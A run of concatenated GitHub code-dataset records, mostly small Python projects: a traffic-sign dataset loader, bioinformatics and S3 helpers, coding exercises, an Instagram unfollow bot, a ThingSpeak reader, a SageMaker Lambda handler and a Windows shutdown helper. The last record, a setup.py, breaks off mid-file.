self.preprocess()\n\n def preprocess(self) -> NoReturn:\n \"\"\"\n preprocess the file (dataset path)\n :return:\n \"\"\"\n if self.dataset == 'tt100k_2021':\n file_path = os.path.join(self.dataset_path, 'annotations_all.json')\n with open(file_path, 'rb') as f:\n data = json.load(f)\n\n self.classes = data['types']\n self._assign_ids()\n imgs = data['imgs']\n\n # for img_id in imgs:\n self.max_num=0\n for img_id in tqdm(imgs, desc='find max len',\n leave=False, ncols=100, mininterval=0.01):\n objects = imgs[img_id]['objects']\n self.max_num=max(self.max_num,len(objects))\n # self.max_num = min(self.max_num, 1)\n train_l = []\n test_val_l = []\n li = ['new_train', 'new_test', 'new_other'] #\n flag=False\n for l in li:\n p = os.path.join('./data/tt100k_2021/', l)\n if not os.path.exists(p):\n flag=True\n os.makedirs(p)\n # for img_id in imgs:\n for img_id in tqdm(imgs, desc='preprocess target',\n leave=False, ncols=100, mininterval=0.01):\n path = imgs[img_id]['path']\n new_path = os.path.join('./data/tt100k_2021/', path)\n objects = imgs[img_id]['objects']\n if not flag:\n # w, h = imagesize.get(new_path)\n w, h = imagesize.get(os.path.join('./data/tt100k_2021/', 'new_' + path))\n else:\n img = Image.open(new_path)\n w, h = img.size\n img = img.resize((self.w, self.h))\n num_box = len(objects)\n gt_boxes = []\n for o in objects:\n bbox = o['bbox']\n category = o['category']\n gt_box = [\n bbox['xmin'] / w * self.w,\n bbox['xmax'] / w * self.w,\n bbox['ymin'] / h * self.h,\n bbox['ymax'] / h * self.h,\n self.class_dict[category]\n ]\n gt_boxes.append(gt_box)\n gt_boxes = np.array(gt_boxes)\n # gt_boxes = np.array(gt_boxes)[:self.max_num,:]\n # num_box=min(self.max_num,num_box)\n gt_boxes=np.pad(gt_boxes,((0,self.max_num-num_box),(0,0)))\n piece = {\n 'path': os.path.join('./data/tt100k_2021/', 'new_' + path),\n 'im_info': torch.from_numpy(np.array([w, h])),\n 'gt_boxes': torch.from_numpy(gt_boxes),\n 'num_box': torch.from_numpy(np.array([num_box]))\n }\n if flag:\n img.save(os.path.join('./data/tt100k_2021/', 'new_' + path))\n if 'train' in path:\n train_l.append(piece)\n elif 'test' in path:\n test_val_l.append(piece)\n tes_val_len = len(test_val_l)\n split = int(np.ceil(tes_val_len * 0.8))\n test_l = test_val_l[:split]\n val_l = test_val_l[split:]\n self.data = {\n 'train': train_l,\n 'test': test_l,\n 'val': val_l\n }\n\n def _assign_ids(self):\n ids = 1\n self.class_dict = {'bg': 0}\n for c in self.classes:\n self.class_dict[c] = ids\n ids += 1\n\n def get_loader(self, phase: str, batch_size: int) -> DataLoader:\n \"\"\"\n :param phase: train or test (may be has val set\n :param batch_size: the batch size of dataloader\n :return: a dataloader for train or test\n \"\"\"\n data = self.data[phase]\n image_set=ImageSet(data)\n return DataLoader(image_set, batch_size=batch_size, num_workers=16, collate_fn=ImageSet._collate)\n\nclass ImageSet(VisionDataset):\n def __init__(self, data):\n super(ImageSet, self).__init__(root='')\n self.datas = data\n self.transform = transforms.Compose([\n transforms.ToTensor()\n ])\n # target_transform=\n\n def __len__(self):\n return len(self.datas)\n\n def __getitem__(self, idx: int):\n data = self.datas[idx]\n img = Image.open(data['path'])\n d = copy.deepcopy(data)\n d['im_data'] = self.transform(img)\n return d\n\n @staticmethod\n def _collate(dicts:List[dict]):\n # t1 = time.time()\n # data = [(d['im_data'], d['im_info'], d['gt_boxes'],d['num_box']) for d in dicts]\n # data = list(zip(*data))\n r= {\n 'im_data':torch.stack([d['im_data'] for d in 
dicts]),\n 'im_info': torch.stack([d['im_info'] for d in dicts]),\n 'gt_boxes': torch.stack([d['gt_boxes'] for d in dicts]),\n 'num_box': torch.stack([d['num_box'] for d in dicts])\n }\n # print(time.time()-t1)\n return r\n\n\nif __name__ == '__main__':\n class args:\n dataset_name = 'tt100k_2021'\n dataset_path = '../data/tt100k_2021'\n\n\n r = Reader(args)\n md = ImageSet(r.data['train'])\n dl = PrefetchLoader(md,batch_size=256, num_workers=8, collate_fn=ImageSet._collate)#\n #\n import time\n\n t1 = time.time()\n t0=t1\n cnt = 0\n for d in dl:\n for k in d:\n d[k].to('cuda:1')\n cnt += 1\n t2=time.time()\n print( t2- t1, cnt)\n sys.stdout.flush()\n t1=t2\n # if cnt == 15:\n # break\n print(time.time() - t0,cnt)","repo_name":"HouraisanMokou/traffic_detect","sub_path":"helper/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":6660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74023620389","text":"#!/usr/bin/env python\n\n\"\"\" compute the spinex\"\"\"\n\nimport os,sys\n\ndef do_with_psipred(fr_n):\n fr=open(fr_n,'r')\n predicts=[line.strip() for line in fr.readlines()]\n fr.close()\n \n AA=\"\"\n SS=\"\"\n for i in range(len(predicts)): # donot do with header\n if predicts[i]:\n onepredict=predicts[i].split()\n SS=SS+onepredict[2]\n AA=AA+onepredict[1]\n return (AA,SS)\n\n\n\n\ndef my_dowith_psipred(fasta_f,ssfolder):\n \"\"\"read in fasta;psipred output folder\"\"\"\n fr_n=fasta_f\n fr=open(fr_n,'r')\n lines=[line.strip() for line in fr.readlines()]\n fr.close()\n AA=\"\"\n SS=\"\"\n AAS=[]\n SSS=[]\n for i in range(len(lines)):\n if len(lines[i])>0 and lines[i][0]=='>':\n proid=lines[i].split()[0][1:]\n #proseq=lines[i+1]\n output_f=\"%s/%s.ss\" %(ssfolder,proid)\n if os.path.isfile(output_f):\n AA,SS=do_with_psipred(output_f)\n else:\n AA=\"\"\n SS=\"\"\n print(\"can not find PSIPRED prediction files %s\" %proid)\n AAS.append(AA)\n SSS.append(SS)\n return((AAS,SSS))\n \ndef api_dowith_psipred(psipredfn):\n ### return predicted ss\n AA=\"\"\n SS=\"\"\n if os.path.isfile(psipredfn):\n AA,SS=do_with_psipred(psipredfn)\n else:\n AA=\"\"\n SS=\"\"\n print(\"can not find PSIPRED prediction files %s\" %psipredfn)\n return(SS)\n \n# =============================================================================\n# if __name__==\"__main__\":\n# if len(sys.argv)<3:\n# print(\"Usage: my_dowith_psipred.py fasta_f, folder, fw_n\")\n# else:\n# fasta_f=sys.argv[1]\n# folder=sys.argv[2]\n# aas,sss=my_dowith_psipred(fasta_f,folder)\n# print(aas)\n# print(sss)\n# \n# =============================================================================\n\n","repo_name":"cliffgao/PSIONplusm","sub_path":"bin/api_02_dowith_psipred.py","file_name":"api_02_dowith_psipred.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"71554007590","text":"import json\nimport random\n\nimport s3fs\n\ndef get_image_data(folder=\"jpgs\",filters=None):\n\tfs = s3fs.S3FileSystem()\n\n\tif filters:\n\t\timage_data_path = f'brissonstagram/inventory/{folder}-metadata.json'\n\telse:\n\t\timage_data_path = f'brissonstagram/inventory/{folder}.json'\n\n\tif fs.exists(image_data_path):\n\t\twith fs.open(image_data_path,'r') as f:\n\t\t\timages = json.loads(f.read())\n\telse:\n\t\tif filters:\n\t\t\tfolder = 'metadata/jpgs'\n\t\telse:\n\t\t\tfolder = 'jpgs'\n\t\timages = create_image_inventory(folder=folder)\n\n\tif filters:\n\n\t\timages = [i for i in images 
if i.get('palette').get('complexity')>100]\n\n\t\tif 'red' in filters:\n\t\t\timages = [i for i in images if (i.get('palette').get('R')>i.get('palette').get('B')) and (i.get('palette').get('R')>i.get('palette').get('G'))]\n\n\t\tif 'green' in filters:\n\t\t\timages = [i for i in images if (i.get('palette').get('G')>i.get('palette').get('B')) and (i.get('palette').get('G')>i.get('palette').get('R'))]\n\n\t\tif 'blue' in filters:\n\t\t\timages = [i for i in images if (i.get('palette').get('B')>i.get('palette').get('R')) and (i.get('palette').get('B')>i.get('palette').get('G'))]\n\n\t\tif 'faces' in filters:\n\t\t\timages = [i for i in images if len(i.get('faces').get('FaceDetails'))>0]\n\n\treturn images\n\n\ndef create_image_inventory(folder=\"jpgs\"):\n\tfs = s3fs.S3FileSystem()\n\tkeys = fs.find(f'brissonstagram/{folder}')\n\t\n\tdata = [{'url':f'https://brissonstagram.s3.amazonaws.com/{\"/\".join(k.split(\"/\")[1:])}'} for k in keys]\n\n\twith fs.open(f'brissonstagram/inventory/{folder}.json','w') as f:\n\t\tf.write(json.dumps(data))\n\n\treturn data\n\n\ndef get_sample_of_images(folder=\"jpgs\",n=100,force_update=False,filters=None):\n\tif force_update:\n\t\tcreate_image_inventory(folder=folder)\n\timages = get_image_data(folder=folder,filters=filters)\n\tsample = random.choices(images,k=n)\n\tfor img in sample:\n\t\timg['id'] = img['url'].split('/')[-1].split('.')[0]\n\t\taxes = ['x','y','z']\n\t\trandom.shuffle(axes)\n\t\timg[axes[0]] = (1+random.random()*.5)*random.choice([-1,1])\n\t\timg[axes[1]] = 1.5-3*random.random()\n\t\timg[axes[2]] = 1.5-3*random.random()\n\treturn sample\n\n\t","repo_name":"HarryBrisson/brissonstagram","sub_path":"app/brissonstagram.py","file_name":"brissonstagram.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"7612669617","text":"import sys\nimport math\n\nMOD = 10 ** 9 + 7\n\n\ndef main():\n S = input()\n\n for i in range(len(S)-1):\n if S[i] == S[i+1]:\n print('Bad')\n return\n\n print('Good')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tamanyan/coding-problems","sub_path":"ABC/131/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"6365106708","text":"#!/usr/bin/python3\n\n\ndef max_integer(my_list=[]):\n Max = 0\n size = len(my_list)\n if size == 0:\n return None\n else:\n for i in my_list:\n if i > Max:\n Max = i\n return Max\n","repo_name":"KingsManhub/alx-higher_level_programming","sub_path":"0x03-python-data_structures/9-max_integer.py","file_name":"9-max_integer.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"38950704339","text":"class User:\n def __init__(self, user_id: int, username):\n self.user_id = user_id\n self.username = username\n self.books = []\n\n\n def get_book(self, author: str, book_name: str, days_to_return: int, library):\n if author not in library.books_available:\n return\n\n if book_name in library.all_rented_books:\n days_left = library.all_rented_books[book_name]\n return f\"The book \\\"{book_name}\\\" is already rented and will be available in {days_left} days!\"\n\n if book_name not in library.books_available[author]:\n return\n\n # Add record in the library rented_books\n if self.username not in library.rented_books:\n library.rented_books[self.username] = {book_name: 
days_to_return}\n else:\n library.rented_books[self.username][book_name] = days_to_return\n\n # Change books_available\n library.books_available[author].remove(book_name)\n # Add book to the User books\n self.books.append(book_name)\n\n library.all_rented_books[book_name] = days_to_return\n return f\"{book_name} successfully rented for the next {days_to_return} days!\"\n\n def return_book(self, author: str, book_name: str, library):\n if book_name not in self.books:\n return f\"{self.username} doesn't have this book in his/her records!\"\n\n self.books.remove(book_name)\n library.books_available[author].append(book_name)\n library.rented_books[self.username].pop(book_name)\n\n def info(self):\n books = sorted(self.books)\n return ', '.join(books)\n\n def __str__(self):\n return f\"{self.user_id}, {self.username}, {self.books}\"\n\n","repo_name":"Xeztor/Softuni_Software-Engineering-Path","sub_path":"Python_Advanced/(P)OOP/02_classes_and_instances/07_library/project/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21168136453","text":"import sys\nfrom selenium import webdriver\nfrom time import sleep\nfrom pprint import pprint\n\n\nwhite_list = [\n 'theminiaturesvault',\n 'siegestudios',\n 'miniwargaming',\n 'warhammerofficial',\n 'immersive_world_crafter',\n 'toadtimemachine',\n 'gatwickgames',\n 'nonzerosumgames',\n 'tarsasnavigator.hu',\n 'nemonovaart',\n 'the_pickled_dragon',\n 'chadwickboseman',\n 'therock',\n 'clarkgregg',\n 'kevinhart4real',\n 'looperhq',\n 'vancityreynolds',\n 'igndotcom',\n 'thatkevinsmith',\n 'rottentomatoes',\n 'comicbook',\n 'mcu_direct',\n 'tessamaethompson',\n 'prattprattpratt',\n 'hamillhimself',\n 'evangelinelillyofficial',\n 'starwars',\n 'chrishemsworth',\n 'dccomics',\n 'jonfavreau',\n 'samuelljackson',\n 'thehughjackman',\n 'karengillan',\n 'therealstanlee',\n 'robertdowneyjr',\n 'tomholland2013',\n 'markruffalo',\n 'renner4real',\n 'marvel',\n 'therussobrothers',\n 'marvelstudios',\n 'iamfires',\n 'darrenlatham',\n]\n\n\nclass GramBot:\n def __init__(self, username, pw):\n self.driver = webdriver.Chrome()\n self.username = username\n self.driver.get(\"https://instagram.com\")\n sleep(2)\n self.driver.find_element_by_xpath(\"//a[contains(text(), 'Log in')]\")\\\n .click()\n sleep(2)\n self.driver.find_element_by_xpath(\"//input[@name=\\\"username\\\"]\")\\\n .send_keys(username)\n self.driver.find_element_by_xpath(\"//input[@name=\\\"password\\\"]\")\\\n .send_keys(pw)\n self.driver.find_element_by_xpath('//button[@type=\"submit\"]')\\\n .click()\n sleep(4)\n self.driver.find_element_by_xpath(\"//button[contains(text(), 'Not Now')]\")\\\n .click()\n sleep(2)\n\n def get_unfollowed(self):\n self.driver.find_element_by_xpath(\"//a[contains(@href,'/{}')]\".format(self.username))\\\n .click()\n sleep(2)\n self.driver.find_element_by_xpath(\"//a[contains(@href,'/following')]\")\\\n .click()\n following = self._get_names()\n self.driver.find_element_by_xpath(\"//a[contains(@href,'/followers')]\")\\\n .click()\n followers = self._get_names()\n not_following_back = [user for user in following if user not in followers]\n to_unfollow = [user for user in not_following_back if user not in white_list]\n to_unfollow.reverse()\n\n return to_unfollow\n\n def _get_names(self):\n sleep(2)\n scroll_box = self.driver.find_element_by_xpath(\"/html/body/div[4]/div/div[2]\")\n\n last_ht, ht = 0, 1\n while last_ht != ht:\n last_ht = ht\n 
sleep(1)\n ht = self.driver.execute_script(\"\"\"\n arguments[0].scrollTo(0, arguments[0].scrollHeight); \n return arguments[0].scrollHeight;\n \"\"\", scroll_box)\n links = scroll_box.find_elements_by_tag_name('a')\n names = [name.text for name in links if name.text != '']\n # close button\n self.driver.find_element_by_xpath(\"/html/body/div[4]/div/div[1]/div/div[2]/button\") \\\n .click()\n return names\n\n def unfollow_users(self, list_of_users):\n for user in list_of_users:\n #print(\"'\" + user)\n self.driver.get(\"https://www.instagram.com/\" + user)\n sleep(5)\n\n # check if verified\n is_verified = self.driver.find_elements_by_class_name(\"coreSpriteVerifiedBadge\")\n #pprint(is_verified)\n\n if is_verified:\n print(\"'\" + user + \"', # has checkmark!!\")\n sleep(20)\n else:\n sleep(60)\n self.driver.find_element_by_xpath('//button[text()=\"Following\"]') \\\n .click()\n self.driver.find_element_by_xpath('//button[text()=\"Unfollow\"]') \\\n .click()\n sleep(35)\n\n def close_browser(self):\n self.driver.quit()\n\n\nif __name__ == '__main__':\n\n if len(sys.argv) > 1:\n\n username = sys.argv[1]\n password = sys.argv[2]\n\n # log in\n bot = GramBot(username, password)\n\n # find unfollowers\n to_unfollow = bot.get_unfollowed()\n\n # unfollow those not on white list\n bot.unfollow_users(to_unfollow)\n\n # close selenium\n bot.close_browser()\n\n else:\n\n print(\"Specify username and password\")\n","repo_name":"omiq/instagram-automation","sub_path":"unfollow.py","file_name":"unfollow.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"20875867950","text":"def isPars(num):\n res = (num % 2 == 0)\n return res\n\ndef sumPars(list):\n sum = 0\n for num in list:\n if(isPars(num)):\n sum += num\n \n return sum\n\nlist_numbers = [5, 10, 6, 2, 7, 4, 8, 3]\n\nsum = sumPars(list_numbers)\nprint(f'O valor total de números pares da lista é: [{sum}]')","repo_name":"MatheusPalmieri/estacio-python","sub_path":"02.Python Estruturado/aula_09.py","file_name":"aula_09.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34061795934","text":"\"\"\"\nMade by - \nRohan Shingre - MSM19B012\n\nThingSpeak Fields:\n1) Field 1: Temperature\n2) Field 2: Humidity\n3) Field 3: Light\n4) Field 4: Pressure\nRead API Endpoint: https://api.thingspeak.com/channels/1312819/feeds.json?api_key=C2BX4LOOP9PEULZG&results=5\n\"\"\"\nimport requests, sqlite3\n\nresponse = requests.get(\n \"https://api.thingspeak.com/channels/1312819/feeds.json?api_key=C2BX4LOOP9PEULZG&results=5\"\n)\n\nif(response.ok):\n response_in_json = response.json()\nelse:\n exit(1) #Exiting if we get Invalid Response\n\ndata = response_in_json.get(\"feeds\")\n\nconnection = connection = sqlite3.connect(\"response.db\")\ncursor = connection.cursor()\n\ncursor.execute(\n \"CREATE TABLE Response (Id INTEGER,Temperature INTEGER, Humidity INTEGER, Light INTEGER, Pressue INTEGER)\"\n) \n\nfor i in data:\n id_ = i['entry_id']\n temperature = int(i['field1'])\n humidity = int(i['field2'])\n light = int(i['field3'])\n pressure = int(i['field4'])\n\n cursor.execute(f\"INSERT INTO Response VALUES ({id_}, {temperature}, {humidity}, {light}, {pressure})\")\n\n\nconnection.commit() \n\nprint(\"Sucessfully Written Response from thingSpeak in 
database.\")","repo_name":"Ulorewien/thingSpeak","sub_path":"read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30582367021","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n# file:6.py\n# author:Asus\n# datetime:2021/5/9 15:49\n# software: PyCharm\n'''\n六 用面向对象,实现一个学生Python成绩管理系统;\n 学生的信息存储在文件中;学生信息的字段有(班级,学号,姓名, Python成绩)\n 实现对学生信息及成绩的增,删,改,查方法;\n'''\n\n# import module your need\n\nimport json\n\n\nclass Student:\n Students = {}\n\n def add_stu(self, id_stu, name, classes, score):\n self.Students[id_stu] = [name, classes, score]\n print('添加成功!')\n\n def del_stu(self, id_stu):\n self.Students.pop(id_stu)\n print('删除成功!')\n\n def update_stu(self, id_stu, name, classes, score):\n self.Students[id_stu] = [name, classes, score]\n print('修改成功!')\n\n def search_stu(self, id_stu):\n if id_stu in self.Students:\n print(f'学号:{id_stu}\\n姓名:{self.Students[id_stu][0]}\\n'\n f'班级:{self.Students[id_stu][1]}\\nPython成绩:{self.Students[id_stu][2]}')\n else:\n print('不存在此学生!')\n\n def save_stu(self):\n with open('./6/json_stu.json', 'w', encoding='utf-8') as f:\n json.dump(self.Students, f)\n print('保存成功!')\n\n def load_stu(self):\n with open('./6/json_stu.json', 'r', encoding='utf-8') as f:\n self.Students = json.load(f)\n self.getInfo()\n\n def getInfo(self):\n print('学号 姓名 班级 python成绩\\n——————————————————————————————————————————————\\n')\n for k, v in self.Students.items():\n print(f'{k} {v[0]} {v[1]} {v[2]}')\n\n\nif __name__ == '__main__':\n stu = Student()\n print('学生Python成绩管理系统\\n1.增加;\\n2.删除;\\n3.修改;\\n4.查询;\\n5.读档;\\n6.保存。\\n 0.退出')\n flag = int(input('输入功能序号'))\n while flag != 0:\n if flag == 1:\n print('增加信息:')\n id_stu = input('输入学号:')\n name = input('输入姓名:')\n classes = input('输入班级:')\n score = input('输入python成绩:')\n stu.add_stu(id_stu, name, classes, score)\n elif flag == 2:\n print('删除信息:')\n id_stu = input('输入需删除学生的学号:')\n stu.del_stu(id_stu)\n elif flag == 3:\n print('修改信息:')\n id_stu = input('输入需修改信息学生的学号:')\n print('请输入修改后的信息:')\n name = input('输入姓名:')\n classes = input('输入班级:')\n score = input('输入python成绩:')\n stu.update_stu(id_stu, name, classes, score)\n elif flag == 4:\n print('查询信息:')\n id_stu = input('输入需查询信息学生的学号:')\n stu.search_stu(id_stu)\n elif flag == 5:\n print('读档')\n stu.load_stu()\n elif flag == 6:\n print('保存')\n stu.save_stu()\n\n print('学生Python成绩管理系统\\n1.增加;\\n2.删除;\\n3.修改;\\n4.查询;\\n5.读档;\\n6.保存。\\n 0.退出')\n flag = int(input('输入功能序号'))\n","repo_name":"xbx12138/Python_study_120191080123","sub_path":"homework/homework06/6_Person_Dog_fight.py","file_name":"6_Person_Dog_fight.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"12380581546","text":"import os\nimport io\nimport boto3\nimport csv, logging, json\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n# grab environment variables\nENDPOINT_NAME = os.environ['ENDPOINT_NAME']\nruntime= boto3.client('runtime.sagemaker')\n\ndef lambda_handler(event, context):\n try:\n logger.info('## ENVIRONMENT VARIABLES\\r' + json.dumps(dict(**os.environ)))\n eventJsonStr=json.dumps(event)\n logger.info('## EVENT\\r' + eventJsonStr)\n logger.info('## CONTEXT\\r' + str(context))\n industryMapping={ \"consulting\": \"1,0,0,0,0,0,0,0\",\n \"retail\" : \"0,1,0,0,0,0,0,0\", \n \"service\" : \"0,0,1,0,0,0,0,0\",\n \"health\" : \"0,0,0,1,0,0,0,0\", \n \"finance\" : \"0,0,0,0,1,0,0,0\", 
\n \"gov\" : \"0,0,0,0,0,1,0,0\",\n \"travel\" : \"0,0,0,0,0,0,1,0\",\n \"energy\" : \"0,0,0,0,0,0,0,1\",\n }\n fullRequest = json.loads(eventJsonStr)\n companyJsonStr = fullRequest['body']\n logger.info('payload:' + companyJsonStr)\n companyJson = json.loads(companyJsonStr)\n payload= str(companyJson['revenu']) \\\n + \",\" + str(companyJson['employee']) \\\n + \",\" + str(companyJson['job30']) \\\n + \",\" + str(companyJson['job90']) \\\n + \",\" + str(companyJson['monthlyFee']) \\\n + \",\" + str(companyJson['totalFee']) \\\n + \",\" + industryMapping[companyJson['industry']]\n \n response = runtime.invoke_endpoint(EndpointName=ENDPOINT_NAME,\n ContentType='text/csv',\n Body=payload)\n result = json.loads(response['Body'].read().decode())\n prediction = result['predictions'][0]\n logger.info(str(prediction))\n except Exception as e:\n # Send some context about this error to Lambda Logs\n print(e)\n raise e\n if prediction['predicted_label'] == 1:\n churn = 'true';\n else:\n churn = 'false';\n return {\n 'statusCode': 200,\n 'body': '{ \"churn\":' + churn +'}'\n }","repo_name":"jbcodeforce/big-data-tenant-analytics","sub_path":"setup/apigw-lambda-cdk/lambda/lambda-handler.py","file_name":"lambda-handler.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"39190716714","text":"# (c) 2020 - Akash Sarkar\r\n# win_nix\r\n\r\nimport sys\r\nsys.path.insert(0, 'E:/Projects/Python/myAssistant/nixAssistant/root/common/')\r\n\r\nimport os\r\nimport ctypes\r\nimport time\r\n\r\nimport speak_nix as nix\r\n\r\ndef lock():\r\n ctypes.windll.user32.LockWorkStation()\r\n time.sleep(1)\r\n print(\"Your windows has been locked\")\r\n nix.speak(\"Windows has been locked!\")\r\n \r\n\r\ndef shutdown(t):\r\n while t:\r\n mins, secs = divmod(t, 60)\r\n timer = '{:1d}{:1d}'.format(mins, secs)\r\n print(timer, end=\"\\r\")\r\n nix.speak(timer)\r\n time.sleep(1)\r\n t -= 1\r\n print(\"Windows is shutting down!\")\r\n nix.speak(\"Windows is shutting down\")\r\n os.system(\"shutdown /s /t 0\")\r\n exit()\r\n\r\ndef restart(t):\r\n while t:\r\n mins, secs = divmod(t, 60)\r\n timer = '{:1d}{:1d}'.format(mins, secs)\r\n print(timer, end=\"\\r\")\r\n nix.speak(timer)\r\n time.sleep(1)\r\n t -= 1\r\n print(\"Windows is restarting now!\")\r\n nix.speak(\"Your Windows is restarting now!\")\r\n os.system(\"shutdown /r /t 0\")\r\n exit()\r\n\r\ndef logoff(t):\r\n while t:\r\n mins, secs = divmod(t, 60)\r\n timer = '{:1d}{:1d}'.format(mins, secs)\r\n print(timer, end=\"\\r\")\r\n nix.speak(timer)\r\n time.sleep(1)\r\n t -= 1\r\n print(\"Windows is logging out!\")\r\n nix.speak(\"Windows is logging out\")\r\n os.system(\"shutdown /l /t 0\")\r\n exit()\r\n","repo_name":"akash-sr12/python-desktop-assistant","sub_path":"root/win_nix.py","file_name":"win_nix.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"18252690331","text":"sr = lambda: input()\nir = lambda: int(sr())\nlr = lambda: list(map(int, sr().split()))\n\nmod = 10 ** 9 + 7\n# mod = 998244353\n\nimport sys\nsys.setrecursionlimit(10**7)\n\nh,w = lr()\na = [lr() for i in range(h)]\ncost = [[0 for j in range(w)] for i in range(h)]\n\nvisited = [[False for j in range(w)] for i in range(h)]\n\ndef getCost(i,j):\n if visited[i][j]:\n return cost[i][j]\n\n ret = 1\n if 0<=i-1 and a[i-1][j] > a[i][j]:\n ret += getCost(i-1, j)\n if 0<=j-1 and a[i][j-1] > a[i][j]:\n ret += 
getCost(i, j-1)\n    if i+1<h and a[i+1][j] > a[i][j]:\n        ret += getCost(i+1, j)\n    if j+1<w and a[i][j+1] > a[i][j]:\n        ret += getCost(i, j+1)\n    ret = ret%mod\n    cost[i][j] = ret\n    visited[i][j] = True\n    return ret\n\n\nfor ny in range(h):\n    for nx in range(w):\n        if visited[ny][nx]:\n            continue\n\n        # 幅優先しつつcostを埋めていく\n        getCost(ny,nx)\n        visited[ny][nx] = True\n\nans = 0\nfor i in range(h):\n    for j in range(w):\n        ans = (ans+cost[i][j])%mod\n\nprint(ans)","repo_name":"masora1030/atcoder","sub_path":"atcoder.jp/abc037/abc037_d/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"74197145189","text":"import time\r\n\r\nfrom server.Controleur.CtrlConversation import CtrlConversation\r\nfrom server.Model.Bucket import Bucket\r\nfrom server.Model.Command import command\r\nfrom server.Model.Statut import statut\r\nfrom server.Utils.Wrapper import Wrapper\r\n\r\n\r\nclass ActionHandler:\r\n\r\n    def __init__(self, parent):\r\n        self.bucket = Bucket()\r\n        self.parent = parent\r\n\r\n    def handle(self,data, sock):\r\n        self.bucket.addMessage(data)\r\n        if self.bucket.getNatureOfLastMessage() == command.ASK:\r\n            appele = self.getUserFromNumTel(self.bucket.getInnerMessage())\r\n            appelant = self.getUserFromSock(sock)\r\n            if self.isDestAvailable(self.bucket.getInnerMessage()):\r\n                ctrlCommunication = CtrlConversation(appelant,appele,self.parent)\r\n                ctrlCommunication.startLoop()\r\n            elif self.isDestExists(self.bucket.getInnerMessage()):\r\n                self.parent.sendMessageTo(appelant.sock, Wrapper.wrapStatus(str(statut.BUSY)))\r\n            else:\r\n                self.parent.sendMessageTo(appelant.sock, Wrapper.wrapError(str(statut.NOT_FOUND)))\r\n\r\n\r\n    def initiateConnectionWithNewUser(self, user):\r\n        self.parent.sendMessageTo(user.sock, Wrapper.wrapStatus(\"202\"))\r\n        time.sleep(1)\r\n        self.parent.sendMessageTo(user.sock, Wrapper.wrapMessage(user.numTel))\r\n\r\n    def isDestAvailable(self, numTel):\r\n        for user in self.parent.connectedUser :\r\n            if user.numTel == numTel and user.statut == statut.READY_FOR_CONVERSATION:\r\n                return True\r\n        return False\r\n    def isDestExists(self, numTel):\r\n        for user in self.parent.connectedUser :\r\n            if user.numTel == numTel:\r\n                return True\r\n        return False\r\n\r\n    def getUserFromNumTel(self,numTel):\r\n        for user in self.parent.connectedUser :\r\n            if user.numTel == numTel:\r\n                return user\r\n\r\n    def getUserFromSock(self,sock):\r\n        for user in self.parent.connectedUser :\r\n            if user.sock == sock:\r\n                return user","repo_name":"azpery/commutel","sub_path":"server/Controleur/ActionHandler.py","file_name":"ActionHandler.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"39689792600","text":"# -*- coding: utf-8 -*-\nfrom setuptools import setup, find_packages\nimport io\nimport os\nimport re\n\n\ndef read(*names, **kwargs):\n    with io.open(\n        os.path.join(os.path.dirname(__file__), *names),\n        encoding=kwargs.get(\"encoding\", \"utf8\")\n    ) as fp:\n        return fp.read()\n\n\nlong_description = read('README.rst')\n\n\ndef find_version(*file_paths):\n    version_file = read(*file_paths)\n    version_match = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\", version_file, re.M)\n    if version_match:\n        return version_match.group(1)\n    raise RuntimeError(\"Unable to find version string.\")\n\n\nsetup(name='elampclient',\n      version=find_version('elampclient', 'version.py'),\n      description='eLamp API clients for Web API',\n      
